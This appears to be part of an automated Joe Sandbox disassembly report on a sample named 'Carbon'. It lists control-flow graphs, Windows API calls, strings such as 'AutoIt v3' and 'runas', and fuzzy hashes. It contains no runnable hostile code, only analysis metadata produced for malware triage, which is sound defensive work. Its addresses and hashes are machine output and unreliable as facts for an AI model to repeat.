                                                            control_flow_graph 864 8f2f92-8f2fa7 865 8f2fa9-8f2fac 864->865 866 8f3007-8f3009 864->866 868 8f2fae-8f2fb5 865->868 869 8f300d 865->869 866->865 867 8f300b 866->867 870 8f2ff2-8f2ffa DefWindowProcW 867->870 873 8f2fbb-8f2fc0 868->873 874 8f3087-8f308f PostQuitMessage 868->874 871 933084-9330ac call 8f4286 call 90f09a 869->871 872 8f3013-8f3018 869->872 876 8f3000-8f3006 870->876 907 9330b1-9330b8 871->907 878 8f303f-8f3066 SetTimer RegisterWindowMessageW 872->878 879 8f301a-8f301d 872->879 880 9330f1-933105 call 95c631 873->880 881 8f2fc6-8f2fca 873->881 877 8f303b-8f303d 874->877 877->876 878->877 882 8f3068-8f3073 CreatePopupMenu 878->882 887 933025-933028 879->887 888 8f3023-8f3036 KillTimer call 8f2f14 call 8f47a8 879->888 880->877 899 93310b 880->899 883 8f3091-8f309b call 90fc73 881->883 884 8f2fd0-8f2fd5 881->884 882->877 901 8f30a0 883->901 889 8f2fdb-8f2fe0 884->889 890 9330d6-9330dd 884->890 894 933060-93307f MoveWindow 887->894 895 93302a-93302e 887->895 888->877 897 8f2fe6-8f2fec 889->897 898 8f3075-8f3085 call 8f30a2 889->898 890->870 905 9330e3-9330ec call 9511b9 890->905 894->877 902 933030-933033 895->902 903 93304f-93305b SetFocus 895->903 897->870 897->907 898->877 899->870 901->877 902->897 908 933039-93304a call 8f4286 902->908 903->877 905->870 907->870 912 9330be-9330d1 call 8f2f14 call 8f3989 907->912 908->877 912->870
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008F2F8C,?,?), ref: 008F2FFA
                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,008F2F8C,?,?), ref: 008F3026
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F3049
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008F2F8C,?,?), ref: 008F3054
                                                            • CreatePopupMenu.USER32 ref: 008F3068
                                                            • PostQuitMessage.USER32(00000000), ref: 008F3089
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 6e4d2345f443d9941b8a650f314d7c698348d43380ab3bda1f00aabc6f452271
                                                            • Instruction ID: 6c4e69a19647862e241005fee1a5aea1fffb5f64d65a127765cf3f2b619d99bb
                                                            • Opcode Fuzzy Hash: 6e4d2345f443d9941b8a650f314d7c698348d43380ab3bda1f00aabc6f452271
                                                            • Instruction Fuzzy Hash: 3F41047062869CABDB385B388C09F793B68F780704F04422AFB42C52E1DF758A40A766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F433C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 920 8f433c-8f4375 921 8f437b-8f4391 mciSendStringW 920->921 922 933d7f-933d80 DestroyWindow 920->922 923 8f4397-8f439f 921->923 924 8f45f2-8f45ff 921->924 925 933d8b-933d98 922->925 923->925 926 8f43a5-8f43b4 call 8f42ae 923->926 927 8f4624-8f462b 924->927 928 8f4601-8f461c UnregisterHotKey 924->928 929 933dc7-933dce 925->929 930 933d9a-933d9d 925->930 941 8f43ba-8f43c2 926->941 942 933dd5-933de1 926->942 927->923 933 8f4631 927->933 928->927 932 8f461e-8f461f call 90fe50 928->932 929->925 938 933dd0 929->938 934 933da9-933dac FindClose 930->934 935 933d9f-933da7 call 8f6903 930->935 932->927 933->924 940 933db2-933dbf 934->940 935->940 938->942 940->929 944 933dc1-933dc2 call 963a20 940->944 945 8f43c8-8f43ed call 8fd530 941->945 946 933df9-933e06 941->946 947 933de3-933de5 FreeLibrary 942->947 948 933deb-933df2 942->948 944->929 958 8f43ef 945->958 959 8f4424-8f442f OleUninitialize 945->959 950 933e08-933e25 VirtualFree 946->950 951 933e2d-933e34 946->951 947->948 948->942 949 933df4 948->949 949->946 950->951 954 933e27-933e28 call 963a86 950->954 951->946 955 933e36 951->955 954->951 960 933e3b-933e3f 955->960 962 8f43f2-8f4422 call 8f40bd call 8f4101 958->962 959->960 961 8f4435-8f443a 959->961 960->961 965 933e45-933e4b 960->965 963 933e50-933e5d call 963a5a 961->963 964 8f4440-8f444a 961->964 962->959 976 933e5f 963->976 967 8f4633-8f4640 call 90fc0b 964->967 968 8f4450-8f44d1 call 8fac28 call 8f4158 call 8f42f6 call 910164 call 8f4873 call 8fac28 call 8fd530 call 8f430c call 910164 964->968 965->961 967->968 981 8f4646 967->981 982 933e64-933e86 call 91011d 968->982 1010 8f44d7-8f44fb call 910164 968->1010 976->982 981->967 988 933e88 982->988 991 933e8d-933eaf call 91011d 988->991 998 933eb1 991->998 1001 933eb6-933ed8 call 91011d 998->1001 1006 933eda 1001->1006 1009 933edf-933eec call 956bcd 1006->1009 1015 933eee 1009->1015 1010->991 1016 8f4501-8f4525 call 910164 1010->1016 1018 933ef3-933f00 call 90bca9 1015->1018 1016->1001 1021 8f452b-8f4545 call 910164 1016->1021 1025 933f02 1018->1025 1021->1009 1026 8f454b-8f456f call 8f42f6 call 910164 1021->1026 1028 933f07-933f14 call 9639b4 1025->1028 1026->1018 1035 8f4575-8f457d 1026->1035 1034 933f16 1028->1034 1036 933f1b-933f28 call 963a3b 1034->1036 1035->1028 1037 8f4583-8f45a1 call 8fac28 call 8f41e0 1035->1037 1042 933f2a 1036->1042 1037->1036 1046 8f45a7-8f45b5 1037->1046 1045 933f2f-933f3c call 963a3b 1042->1045 1051 933f3e 1045->1051 1046->1045 1048 8f45bb-8f45f1 call 8fac28 * 3 call 8f421a 1046->1048 1051->1051
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008F4385
                                                            • OleUninitialize.OLE32(?,00000000), ref: 008F4424
                                                            • UnregisterHotKey.USER32(?), ref: 008F4609
                                                            • DestroyWindow.USER32(?), ref: 00933D80
                                                            • FreeLibrary.KERNEL32(?), ref: 00933DE5
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00933E12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 0a9df95e4195158cb02c6c715849bf237f6d659d2e3fa9e1eef5b0a54a9ab18f
                                                            • Instruction ID: 30c87f15d806db293c5fd94cfb533c024875c398b7fae66b970746df6e509175
                                                            • Opcode Fuzzy Hash: 0a9df95e4195158cb02c6c715849bf237f6d659d2e3fa9e1eef5b0a54a9ab18f
                                                            • Instruction Fuzzy Hash: 69D18E71741216DFCB28EF24C845B6AF7A4FF44714F1182AEE64AAB291CB31AD52CF41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00929095 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1141 929095-9290a5 1142 9290a7-9290ba call 922b55 call 922b68 1141->1142 1143 9290bf-9290c1 1141->1143 1157 929441 1142->1157 1145 9290c7-9290cd 1143->1145 1146 929429-929436 call 922b55 call 922b68 1143->1146 1145->1146 1149 9290d3-9290fe 1145->1149 1163 92943c call 922aac 1146->1163 1149->1146 1152 929104-92910d 1149->1152 1155 929127-929129 1152->1155 1156 92910f-929122 call 922b55 call 922b68 1152->1156 1160 929425-929427 1155->1160 1161 92912f-929133 1155->1161 1156->1163 1162 929444-929449 1157->1162 1160->1162 1161->1160 1165 929139-92913d 1161->1165 1163->1157 1165->1156 1166 92913f-929156 1165->1166 1169 929173-92917c 1166->1169 1170 929158-92915b 1166->1170 1174 92919a-9291a4 1169->1174 1175 92917e-929195 call 922b55 call 922b68 call 922aac 1169->1175 1172 929165-92916e 1170->1172 1173 92915d-929163 1170->1173 1176 92920f-929229 1172->1176 1173->1172 1173->1175 1178 9291a6-9291a8 1174->1178 1179 9291ab-9291c9 call 923b70 call 922d18 * 2 1174->1179 1206 92935c 1175->1206 1181 92922f-92923f 1176->1181 1182 9292fd-929306 call 92fbee 1176->1182 1178->1179 1210 9291e6-92920c call 929774 1179->1210 1211 9291cb-9291e1 call 922b68 call 922b55 1179->1211 1181->1182 1187 929245-929247 1181->1187 1195 929308-92931a 1182->1195 1196 929379 1182->1196 1187->1182 1188 92924d-929273 1187->1188 1188->1182 1192 929279-92928c 1188->1192 1192->1182 1197 92928e-929290 1192->1197 1195->1196 1201 92931c-92932b GetConsoleMode 1195->1201 1199 92937d-929395 ReadFile 1196->1199 1197->1182 1202 929292-9292bd 1197->1202 1204 9293f1-9293fc GetLastError 1199->1204 1205 929397-92939d 1199->1205 1201->1196 1207 92932d-929331 1201->1207 1202->1182 1209 9292bf-9292d2 1202->1209 1212 929415-929418 1204->1212 1213 9293fe-929410 call 922b68 call 922b55 1204->1213 1205->1204 1214 92939f 1205->1214 1208 92935f-929369 call 922d18 1206->1208 1207->1199 1215 929333-92934d ReadConsoleW 1207->1215 1208->1162 1209->1182 1217 9292d4-9292d6 1209->1217 1210->1176 1211->1206 1224 929355-92935b call 922b32 1212->1224 1225 92941e-929420 1212->1225 1213->1206 1221 9293a2-9293b4 1214->1221 1222 92936e-929377 1215->1222 1223 92934f GetLastError 1215->1223 1217->1182 1228 9292d8-9292f8 1217->1228 1221->1208 1232 9293b6-9293ba 1221->1232 1222->1221 1223->1224 1224->1206 1225->1208 1228->1182 1236 9293d3-9293de 1232->1236 1237 9293bc-9293cc call 928db1 1232->1237 1238 9293e0 call 928f01 1236->1238 1239 9293ea-9293ef call 928bf1 1236->1239 1246 9293cf-9293d1 1237->1246 1247 9293e5-9293e8 1238->1247 1239->1247 1246->1208 1247->1246
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 273f66b4cb9e0622aae5558bb30ffcec4d7a8efc9404efa5fae78188f7ed3747
                                                            • Instruction ID: bc1d9ebb0f372a3eab6fa16ff31cce84002ea45c3783955238441653e02a5455
                                                            • Opcode Fuzzy Hash: 273f66b4cb9e0622aae5558bb30ffcec4d7a8efc9404efa5fae78188f7ed3747
                                                            • Instruction Fuzzy Hash: 7FC1D470D08269AFDF11DFA9E841BADBBB8FF4A310F184199E414AB3D6C7349941CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0090AAF7 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1249 90aaf7-90af1c call 8f7e30 call 90bb11 call 8fd530 1256 948446-948453 1249->1256 1257 90af22-90af2c 1249->1257 1258 948455 1256->1258 1259 948458-948467 1256->1259 1260 90af32-90af37 1257->1260 1261 94882d-94883b 1257->1261 1258->1259 1262 94846c 1259->1262 1263 948469 1259->1263 1266 948474-948476 1260->1266 1267 90af3d-90af49 call 90b46f 1260->1267 1264 948840 1261->1264 1265 94883d 1261->1265 1262->1266 1263->1262 1268 948847-948850 1264->1268 1265->1264 1272 94847f 1266->1272 1267->1272 1274 90af4f-90af5c call 8fb81d 1267->1274 1270 948855 1268->1270 1271 948852 1268->1271 1277 94885e-9488ad call 8fd530 call 90ba77 * 2 1270->1277 1271->1270 1276 948489 1272->1276 1280 90af64-90af6d 1274->1280 1281 948491-948494 1276->1281 1310 9488b3-9488c5 call 90b46f 1277->1310 1311 90b099-90b0ae 1277->1311 1283 90af71-90af8f call 914d78 1280->1283 1284 90b011-90b028 1281->1284 1285 94849a-9484c2 call 914cb3 call 8f69c4 1281->1285 1305 90af91-90af9a 1283->1305 1306 90af9e 1283->1306 1288 948816-948819 1284->1288 1289 90b02e 1284->1289 1321 9484c4-9484c8 1285->1321 1322 9484ef-948513 call 8f6a09 call 8fac28 1285->1322 1294 948903-94893b call 8fd530 call 90ba77 1288->1294 1295 94881f-948822 1288->1295 1296 90b034-90b037 1289->1296 1297 9487c1-9487e2 call 8fd530 1289->1297 1294->1311 1354 948941-948953 call 90b46f 1294->1354 1295->1277 1302 948824-948827 1295->1302 1303 90b03d-90b040 1296->1303 1304 9485eb-948605 call 90ba77 1296->1304 1297->1311 1326 9487e8-9487fa call 90b46f 1297->1326 1302->1261 1302->1311 1312 90b046-90b049 1303->1312 1313 94858c-9485a2 call 8f5a63 1303->1313 1331 948751-948777 call 8fd530 1304->1331 1332 94860b-94860e 1304->1332 1305->1283 1314 90af9c 1305->1314 1306->1276 1316 90afa4-90afb5 1306->1316 1345 9488c7-9488cf 1310->1345 1346 9488f1-9488fe call 8fb81d 1310->1346 1328 90b0b4-90b0c4 call 8fd530 1311->1328 1329 94898b-948991 1311->1329 1324 948518-94851b 1312->1324 1325 90b04f-90b071 call 8fd530 1312->1325 1313->1311 1343 9485a8-9485be call 90b46f 1313->1343 1314->1316 1316->1261 1327 90afbb-90afd5 1316->1327 1321->1322 1335 9484ca-9484ed call 8f9c50 1321->1335 1322->1324 1324->1261 1341 948521-948536 call 8f5a63 1324->1341 1325->1311 1362 90b073-90b085 call 90b46f 1325->1362 1365 948807 1326->1365 1366 9487fc-948805 call 8fb81d 1326->1366 1327->1281 1340 90afdb-90b00d call 90ba77 call 8fd530 1327->1340 1329->1280 1333 948997 1329->1333 1331->1311 1387 94877d-94878f call 90b46f 1331->1387 1352 948610-948613 1332->1352 1353 948681-9486a0 call 8fd530 1332->1353 1333->1261 1335->1321 1335->1322 1340->1284 1341->1311 1384 94853c-948552 call 90b46f 1341->1384 1391 9485c0-9485cd call 8f7e30 1343->1391 1392 9485cf-9485d8 call 8f7e30 1343->1392 1360 9488e0-9488eb call 8fa344 1345->1360 1361 9488d1-9488d5 1345->1361 1398 948984-948986 1346->1398 1368 94899c-9489aa 1352->1368 1369 948619-948636 call 8fd530 1352->1369 1353->1311 1390 9486a6-9486b8 call 90b46f 1353->1390 1402 948955-94895d 1354->1402 1403 948977-948980 call 8fb81d 1354->1403 1360->1346 1408 9489cd-9489db 1360->1408 1361->1360 1377 9488d7-9488db 1361->1377 1409 94857c-948585 call 8fb81d 1362->1409 1410 90b08b-90b097 1362->1410 1383 94880b-948811 1365->1383 1366->1383 1375 9489ac 1368->1375 1376 9489af-9489bf 1368->1376 1369->1311 1412 94863c-94864e call 90b46f 1369->1412 1375->1376 1393 9489c4-9489c8 1376->1393 1394 9489c1 1376->1394 1395 948963-948965 1377->1395 1383->1311 1422 948554-94855d call 8fb81d 1384->1422 1423 94855f-94856d call 8f7e30 1384->1423 1427 9487a0 1387->1427 1428 948791-94879e call 8fb81d 1387->1428 1390->1311 1431 9486be-9486c7 call 90b46f 1390->1431 1432 9485db-9485e6 call 8f7467 1391->1432 1392->1432 1393->1328 1394->1393 1395->1311 1398->1311 1413 94895f 1402->1413 1414 94896a-948975 call 8fa344 1402->1414 1403->1398 1419 9489e0-9489e3 1408->1419 1420 9489dd 1408->1420 1409->1313 1410->1311 1445 948650-94865f call 8fb81d 1412->1445 1446 948661 1412->1446 1413->1395 1414->1403 1414->1408 1419->1268 1420->1419 1452 948570-948577 1422->1452 1423->1452 1430 9487a4-9487ab 1427->1430 1428->1430 1439 9487b7 call 8f2f14 1430->1439 1440 9487ad-9487b2 call 8f3989 1430->1440 1457 9486c9-9486d8 call 8fb81d 1431->1457 1458 9486da 1431->1458 1432->1311 1456 9487bc 1439->1456 1440->1311 1454 948665-948670 call 919314 1445->1454 1446->1454 1452->1311 1454->1261 1464 948676-94867c 1454->1464 1456->1311 1462 9486de-948701 1457->1462 1458->1462 1466 948703-94870a 1462->1466 1467 94870f-948712 1462->1467 1464->1311 1466->1467 1468 948714-94871d 1467->1468 1469 948722-948725 1467->1469 1468->1469 1470 948735-948738 1469->1470 1471 948727-948730 1469->1471 1470->1311 1472 94873e-94874c 1470->1472 1471->1470 1472->1311
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                            • API String ID: 0-4285391669
                                                            • Opcode ID: 7a2f59607a753c9a141f386bd2d0624d99fed125e05a59317b4b70c3f9e5253a
                                                            • Instruction ID: 1d91399b99da637241221bac98980e67144e72b4f6323d72d84c1929b34c7ce3
                                                            • Opcode Fuzzy Hash: 7a2f59607a753c9a141f386bd2d0624d99fed125e05a59317b4b70c3f9e5253a
                                                            • Instruction Fuzzy Hash: 51622970509341DFC728DF24D094AAABBE5FF88304F14895EE5998B3A1DB71D949CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F294B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1509 8f294b-8f29bb CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F2979
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F299A
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008F1727,?), ref: 008F29AE
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008F1727,?), ref: 008F29B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: edd17e0f81e2b5a0424272e598f08d1bc011251c9b4f52e6aafb31de8b18c1f9
                                                            • Instruction ID: b54ce5c7202717b5f1f021a5176ebee583eb8f60cd29b877298d9a900fafba36
                                                            • Opcode Fuzzy Hash: edd17e0f81e2b5a0424272e598f08d1bc011251c9b4f52e6aafb31de8b18c1f9
                                                            • Instruction Fuzzy Hash: CDF0DA719653D07AEA3117276C18E372EBDD7CBF60B11005EB904A22A0D6691850EBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F5033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009342BC
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5123
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                            • String ID: Line %d: $AutoIt - $%%
                                                            • API String ID: 2289894680-2203676808
                                                            • Opcode ID: c14ec42c78700d9deeacb117a9ae61bc773a249ea113cf27099a76db13e67533
                                                            • Instruction ID: 84375239682a9632246cd783375e689d8021394e0003075f639f8ca624d72b62
                                                            • Opcode Fuzzy Hash: c14ec42c78700d9deeacb117a9ae61bc773a249ea113cf27099a76db13e67533
                                                            • Instruction Fuzzy Hash: 6841A271408308AAC320EB34DC45FEF77D8EF94764F10462AF698D2091EB30E6498B97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095EFBC Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0095EFD8
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0095EFE6
                                                            • Sleep.KERNEL32(00000000), ref: 0095EFEE
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0095EFF8
                                                            • Sleep.KERNEL32 ref: 0095F034
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 46d1503cf01d6ae7e09dc59c1eb5ba4f9cdc2c026b1aabd700f39e896786113d
                                                            • Instruction ID: 7df1461e8c53c55eff19daae3e7d98bf6be82a88fe489c42816414be11e61de6
                                                            • Opcode Fuzzy Hash: 46d1503cf01d6ae7e09dc59c1eb5ba4f9cdc2c026b1aabd700f39e896786113d
                                                            • Instruction Fuzzy Hash: EB016D31C09529DBCF04EFB5DC5C9EDBB78BF08312F050455E902B22D0CB3495589B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00932F58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F2853
                                                              • Part of subcall function 008F3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 008F3DEF
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,009B3204), ref: 00932FC3
                                                            • ShellExecuteW.SHELL32(00000000,?,?,009B3204), ref: 00932FCA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                            • String ID: runas
                                                            • API String ID: 448630720-4000483414
                                                            • Opcode ID: 56e8cfed49a8f578700d0ac5caf0ec3ae594a71cb8e4271590d10885a1c90a07
                                                            • Instruction ID: 55eadef450b6a86659fe3e906cde57ff1124afcd2a2ba566c353fe3198376ae0
                                                            • Opcode Fuzzy Hash: 56e8cfed49a8f578700d0ac5caf0ec3ae594a71cb8e4271590d10885a1c90a07
                                                            • Instruction Fuzzy Hash: E411AF71618348ABCB18FB78EC51E7EBBA4FBD0754F40042EB382D20A2CA649949D753
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F4674 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F4698
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F46B9
                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F46DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
